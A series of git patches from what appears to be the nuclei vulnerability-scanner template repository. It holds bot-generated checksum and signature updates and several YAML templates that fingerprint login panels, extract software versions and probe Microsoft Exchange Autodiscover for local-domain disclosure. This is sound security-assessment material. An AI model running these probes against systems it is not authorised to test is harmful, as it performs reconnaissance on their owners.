'http/cves/2023/CVE-2023-1892.yaml' - - 'http/cves/2023/CVE-2023-2227.yaml' - - 'http/cves/2023/CVE-2023-27032.yaml' - - 'http/cves/2023/CVE-2023-2948.yaml' - - 'http/cves/2023/CVE-2023-2949.yaml' - - 'http/cves/2023/CVE-2023-31446.yaml' - - 'http/cves/2023/CVE-2023-32077.yaml' - - 'http/cves/2023/CVE-2023-38964.yaml' - - 'http/cves/2023/CVE-2023-43208.yaml' - - 'http/cves/2023/CVE-2023-44812.yaml' - - 'http/cves/2023/CVE-2023-4521.yaml' - - 'http/cves/2023/CVE-2023-45375.yaml' - - 'http/cves/2023/CVE-2023-46347.yaml' - - 'http/cves/2023/CVE-2023-4973.yaml' - - 'http/cves/2023/CVE-2023-5003.yaml' - - 'http/cves/2023/CVE-2023-6389.yaml' - - 'http/cves/2023/CVE-2023-6989.yaml' - - 'http/cves/2024/CVE-2024-0235.yaml' - - 'http/cves/2024/CVE-2024-0881.yaml' - - 'http/cves/2024/CVE-2024-1183.yaml' - - 'http/cves/2024/CVE-2024-22927.yaml' - - 'http/cves/2024/CVE-2024-2340.yaml' - - 'http/cves/2024/CVE-2024-23917.yaml' - - 'http/cves/2024/CVE-2024-24131.yaml' - - 'http/cves/2024/CVE-2024-27956.yaml' - - 'http/cves/2024/CVE-2024-2876.yaml' - - 'http/cves/2024/CVE-2024-3136.yaml' - - 'http/cves/2024/CVE-2024-31621.yaml' - - 'http/cves/2024/CVE-2024-31848.yaml' - - 'http/cves/2024/CVE-2024-31849.yaml' - - 'http/cves/2024/CVE-2024-31850.yaml' - - 'http/cves/2024/CVE-2024-31851.yaml' - - 'http/cves/2024/CVE-2024-32399.yaml' - - 'http/cves/2024/CVE-2024-32640.yaml' - - 'http/cves/2024/CVE-2024-32651.yaml' - - 'http/cves/2024/CVE-2024-33575.yaml' - - 'http/cves/2024/CVE-2024-33724.yaml' - - 'http/cves/2024/CVE-2024-4040.yaml' - - 'http/cves/2024/CVE-2024-4348.yaml' - - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' - - 'http/default-logins/crushftp/crushftp-default-login.yaml' - - 'http/default-logins/soplanning/soplanning-default-login.yaml' - - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - - 'http/exposed-panels/bonobo-server-panel.yaml' - - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' - - 'http/exposed-panels/cyberchef-panel.yaml' - - 'http/exposed-panels/femtocell-panel.yaml' - - 'http/exposed-panels/monitorr-panel.yaml' - - 'http/exposed-panels/openwebui-panel.yaml' - - 'http/exposed-panels/teamforge-panel.yaml' - - 'http/exposed-panels/tixeo-panel.yaml' - - 'http/exposed-panels/umami-panel.yaml' - - 'http/misconfiguration/installer/eyoucms-installer.yaml' - - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - - 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml' - - 'http/misconfiguration/titannit-web-exposure.yaml' - - 'http/takeovers/squadcast-takeover.yaml' - - 'http/vulnerabilities/citrix/citrix-oob-memory-read.yaml' - - 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml' - - 'http/vulnerabilities/titan/titannit-web-rce.yaml' - - 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml' - - 'network/detection/aix-websm-detect.yaml' - - 'network/detection/bluecoat-telnet-proxy-detect.yaml' + - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 79addad201dec6b2df1da892167b644260923367 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:30:02 +0000 Subject: [PATCH 0781/1768] Auto Generated New Template Addition List [Sat May 11 09:30:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6adb054b53..1daa818654 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/cves/2024/CVE-2024-0200.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml From 84e12a1d27a7719202e2705d50f1753eb58c2dd3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:30:08 +0000 Subject: [PATCH 0782/1768] Auto Generated Templates Checksum [Sat May 11 09:30:08 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2b7a03afae..54518e220d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3225,6 +3225,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac +http/cves/2024/CVE-2024-0200.yaml:29706de82fa06b1f03343e535e5635384b64f0d0 http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 @@ -5432,6 +5433,7 @@ http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62a http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d http/misconfiguration/installer/sabnzbd-installer.yaml:2acada1b432839b43acf35fc04137d074444be5c http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8 +http/misconfiguration/installer/setup-github-enterprise.yaml:e7fae18ff04e7d7f9a4733b5b460d81e7ad63154 http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 @@ -5597,7 +5599,6 @@ http/misconfiguration/server-status-localhost.yaml:920d65e7e9cd3d8b02094cc32aa42 http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b -http/misconfiguration/setup-github-enterprise.yaml:14bd64ce441f1a736a86cd8b6b5789d5e8be4792 http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d http/misconfiguration/sitecore-lfi.yaml:1a0abe7d31d65b931c8e017a94fecc7e3086333c @@ -8500,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:03f78448d513dc484792dff6b49195c220854bf7 +templates-checksum.txt:8709769c62717849e03b16286968fe4a1c7fe9d1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7202657d445bbc998002850a1179a7a9c5d2f7a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:30:24 +0000 Subject: [PATCH 0783/1768] Auto Template Signing [Sat May 11 09:30:24 UTC 2024] :robot: --- http/misconfiguration/installer/phpmyfaq-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml index c8201f32b1..8cd43c5d56 100644 --- a/http/misconfiguration/installer/phpmyfaq-installer.yaml +++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml @@ -29,3 +29,4 @@ http: part: header words: - 'phpmyfaq-setup' +# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7ed3ee5e1587206653b54c674d39cf13fdad7f81 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:30:41 +0000 Subject: [PATCH 0784/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index de8ff83bd5..cd0572411c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' workflow_dispatch: jobs: From 133474df85d2c20dee1ead2590f18772497b2ce3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:32:42 +0000 Subject: [PATCH 0786/1768] Auto Template Signing [Sat May 11 09:32:42 UTC 2024] :robot: --- http/cves/2024/CVE-2024-0200.yaml | 1 + http/misconfiguration/installer/setup-github-enterprise.yaml | 3 +-- http/misconfiguration/internal-ip-disclosure.yaml | 3 +-- 3 files changed, 3 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index d7eb5bd794..da0e5881ed 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -141,3 +141,4 @@ http: part: interactsh_protocol words: - "dns" +# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml index bddf943674..cfaa8ef618 100644 --- a/http/misconfiguration/installer/setup-github-enterprise.yaml +++ b/http/misconfiguration/installer/setup-github-enterprise.yaml @@ -27,5 +27,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022054ec1cd746591f30334be3d3af156ab086f89a6120fb908f899320a462f7ac8e02204e63937eb2e1648bfb9cdc3f74cd58e4846ee18ad4d2db21b9e7db237578ec4e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/internal-ip-disclosure.yaml b/http/misconfiguration/internal-ip-disclosure.yaml index 790bd2e7a6..72fea3e819 100644 --- a/http/misconfiguration/internal-ip-disclosure.yaml +++ b/http/misconfiguration/internal-ip-disclosure.yaml @@ -45,5 +45,4 @@ http: part: location regex: - '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$' - -# digest: 4a0a00473045022100be01acb985c09c3394bcce936ba1cc283802b1069e6fcc5f63196c772bd55f5a02207165d8ff2b202e511f03d2c75a241b2f933b85b3993f668651c3db8216243382:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202ccecab303233a1e75a78c8d3912d25f4b57cea0f77bde7b02f472f4084515f602205c380911aaf6c5293902999ed0f4901d57b5451c7fe26b1f1d209e9fee407854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 004a01de6bad3d365f1fb34835a291a00ac66eee Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 11 May 2024 16:35:32 +0200 Subject: [PATCH 0787/1768] Add files via upload --- http/exposed-panels/craftercms-panel.yaml | 34 +++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/craftercms-panel.yaml diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml new file mode 100644 index 0000000000..7e78405dd8 --- /dev/null +++ b/http/exposed-panels/craftercms-panel.yaml @@ -0,0 +1,34 @@ +id: craftercms-panel + +info: + name: CrafterCMS Login Panel - Detect + author: righettod + severity: info + description: | + CrafterCMS login panel was detected. + reference: + - https://craftercms.org/ + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"craftercms" + tags: panel,craftercms,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/studio/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file From 8bcf8b50813f45f627938552055882e042f9138b Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 11 May 2024 16:50:35 +0200 Subject: [PATCH 0788/1768] Add files via upload --- http/technologies/craftercms-detect.yaml | 34 ++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/technologies/craftercms-detect.yaml diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml new file mode 100644 index 0000000000..e8ca729dfe --- /dev/null +++ b/http/technologies/craftercms-detect.yaml @@ -0,0 +1,34 @@ +id: craftercms-detect + +info: + name: CrafterCMS - Detect + author: righettod + severity: info + description: | + CrafterCMS was detected. + reference: + - https://craftercms.org/ + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"craftercms" + tags: tech,craftercms,detect + +http: + - method: GET + path: + - "{{BaseURL}}/studio" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file From b8537f802824563fcaf4f5cbe6d46ce337f1295d Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 11 May 2024 17:44:52 +0200 Subject: [PATCH 0789/1768] Update apache-apisix-panel.yaml --- http/exposed-panels/apache/apache-apisix-panel.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index 031a456b4a..3f3c0b7404 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -2,7 +2,7 @@ id: apache-apisix-panel info: name: Apache APISIX Login Panel - author: pikpikcu + author: pikpikcu,righettod severity: info description: An Apache APISIX login panel was detected. classification: @@ -30,4 +30,10 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009511db3bd4110569d3adb76780b1eae709159c92d71b9fd0e0f3665aa25c65ef02210080459d36c4880e531941e8516355f1deb7e67881bc8a203be2cf734becaa4d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: header + group: 1 + regex: + - '(?i)Server:\s+APISIX\/([0-9.]+)' From 3ba4873cce816767d18be0eb322f4edc0b0f6e70 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Sun, 12 May 2024 03:08:09 +0800 Subject: [PATCH 0790/1768] fix severity --- .../microsoft/ms-exchange-local-domain.yaml | 90 +++++++++---------- 1 file changed, 45 insertions(+), 45 deletions(-) diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 66de26d4bc..602a0d8de5 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -1,45 +1,45 @@ -id: ms-exchange-local-domain - -info: - name: Microsoft Exchange Autodiscover - Local Domain Exposure - author: userdehghani - severity: low - description: | - Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. - impact: | - An attacker can leverage this information for reconnaissance and targeted attacks. - remediation: | - Restrict access to the Autodiscover service or configure it to not expose local domain information. - reference: - - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - shodan-query: http.title:outlook exchange - tags: misconfig, microsoft,ms-exchange,ad,dc - -http: - - method: GET - path: - - "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1" - - matchers-condition: and - matchers: - - type: regex - part: header - regex: - - "(?i)(X-Calculatedbetarget:)" - - - type: status - status: - - 200 - - 302 - - extractors: - - type: kval - kval: - - x_calculatedbetarget -# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +id: ms-exchange-local-domain + +info: + name: Microsoft Exchange Autodiscover - Local Domain Exposure + author: userdehghani + severity: info + description: | + Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. + impact: | + An attacker can leverage this information for reconnaissance and targeted attacks. + remediation: | + Restrict access to the Autodiscover service or configure it to not expose local domain information. + reference: + - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:outlook exchange + tags: misconfig, microsoft,ms-exchange,ad,dc + +http: + - method: GET + path: + - "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "(?i)(X-Calculatedbetarget:)" + + - type: status + status: + - 200 + - 302 + + extractors: + - type: kval + kval: + - x_calculatedbetarget +# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950 From 6b9a8802e89ed8c0b82150f47ce301be2eee198e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 19:48:46 +0000 Subject: [PATCH 0792/1768] Auto Generated Templates Checksum [Sat May 11 19:48:46 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 54518e220d..5609585042 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3225,7 +3225,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac -http/cves/2024/CVE-2024-0200.yaml:29706de82fa06b1f03343e535e5635384b64f0d0 +http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 @@ -5421,7 +5421,7 @@ http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac0 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d -http/misconfiguration/installer/phpmyfaq-installer.yaml:c854a51d6f8e9bbbe41deec1965f973a7e753aa5 +http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 @@ -5433,7 +5433,7 @@ http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62a http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d http/misconfiguration/installer/sabnzbd-installer.yaml:2acada1b432839b43acf35fc04137d074444be5c http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8 -http/misconfiguration/installer/setup-github-enterprise.yaml:e7fae18ff04e7d7f9a4733b5b460d81e7ad63154 +http/misconfiguration/installer/setup-github-enterprise.yaml:4c9c45144ef261e828a016e779c788a97640107d http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 @@ -5465,7 +5465,7 @@ http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a http/misconfiguration/installer/zenphoto-setup.yaml:90123a5fbb91a4f9e860152c5f07d8a141669ed8 http/misconfiguration/intelbras-dvr-unauth.yaml:d03e03c47bafc20e0abed9052e731db888770f83 -http/misconfiguration/internal-ip-disclosure.yaml:e6a79c10e8a84b1146826ec646fe0beb90b86761 +http/misconfiguration/internal-ip-disclosure.yaml:ffb198989918d9f1e1cafafcd3470931ff6eaa4e http/misconfiguration/iot-vdme-simulator.yaml:c4c40ebfaba9239c6e0c5f14e6957533cdb11631 http/misconfiguration/jaeger-ui-dashboard.yaml:4584cce5677c777fcde741579d1ba52bccec4491 http/misconfiguration/java-melody-exposed.yaml:3e4299de8400eb02ef9f769cc044e7255e87522e @@ -6685,7 +6685,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:43e1210c06cedc5762c38b9ed9690d21e0d01527 +http/technologies/favicon-detect.yaml:338fb7b684fa9ea824607e7108117bc570d495d7 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8709769c62717849e03b16286968fe4a1c7fe9d1 +templates-checksum.txt:1f0bbdcbed0ef843e234ee52039f0c523ceb65ce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d6063dba87b5822a72feb5fbc86043b4c1c54fa4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 19:50:33 +0000 Subject: [PATCH 0793/1768] Auto Template Signing [Sat May 11 19:50:33 UTC 2024] :robot: --- http/technologies/favicon-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 0f2e2aa252..e3d9398fd9 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3745,4 +3745,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4b0a004830460221008c5613a5a0cf6abacf4895de42c95ec8b316479ea03c21cf335e942cbcf87ccf022100877e480c73ae4cfbba3520153c4792344db60a7b3a44c138faf845db3bd10fdf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c8bddb53fa936be9b6fbc7fd66feb697d5d52aca31e1c86cba815603d6f36b780221008d13bd9355885cd5ce520d970de1599c5380197d0da9109d264f45e61fdc58d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 287f466314f452e388355038dec9a4056dd33d50 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sun, 12 May 2024 08:39:51 +0330 Subject: [PATCH 0794/1768] Update uptime-kuma-panel tags and reference --- http/exposed-panels/uptime-kuma-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index 2dd78c7795..5d4627e076 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -8,12 +8,12 @@ info: Realtime website and application monitoring tool reference: - https://github.com/louislam/uptime-kuma - - https://uptime.kuma.pet/docs/ + - https://github.com/louislam/uptime-kuma/wiki metadata: max-request: 1 shodan-query: title:"Uptime Kuma" verified: true - tags: uptime,kuma,panel,login + tags: uptime,kuma,panel,login,detect http: - method: GET From 31e936cbfc1455bf27dede4f65e6adc7290d4664 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sun, 12 May 2024 09:14:31 +0330 Subject: [PATCH 0795/1768] Add description and reference --- http/exposed-panels/umami-panel.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 0384dd6d83..3033077009 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -4,6 +4,11 @@ info: name: Umami Panel - Detect author: userdehghani severity: info + description: | + simple, fast, privacy-focused, open-source analytics solution. + reference: + - https://umami.is/ + - https://umami.is/docs metadata: verified: true max-request: 1 From b6d00d4baf8f300460493bcdc239ef1d2d614cc4 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sun, 12 May 2024 09:43:25 +0330 Subject: [PATCH 0796/1768] Add unleash-panel.yaml --- http/exposed-panels/unleash-panel.yaml | 34 ++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/unleash-panel.yaml diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml new file mode 100644 index 0000000000..540960bb42 --- /dev/null +++ b/http/exposed-panels/unleash-panel.yaml @@ -0,0 +1,34 @@ +id: unleash-panel + +info: + name: Unleash Panel - Detect + author: userdehghani + severity: info + description: | + Open-source feature management solution built for developers. + reference: + - https://www.getunleash.io/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-3686276641 + tags: panel,unleash,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Unleash' + - 'href="https://cdn.getunleash.io/favicon.ico"' + case-insensitive: true + condition: and + + - type: status + status: + - 200 From e3b246ca74b1888c23386230b809c4b8a06e8d9b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 12 May 2024 06:55:29 +0000 Subject: [PATCH 0798/1768] Auto Generated Templates Checksum [Sun May 12 06:55:29 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5609585042..52b670523d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4447,7 +4447,7 @@ http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90 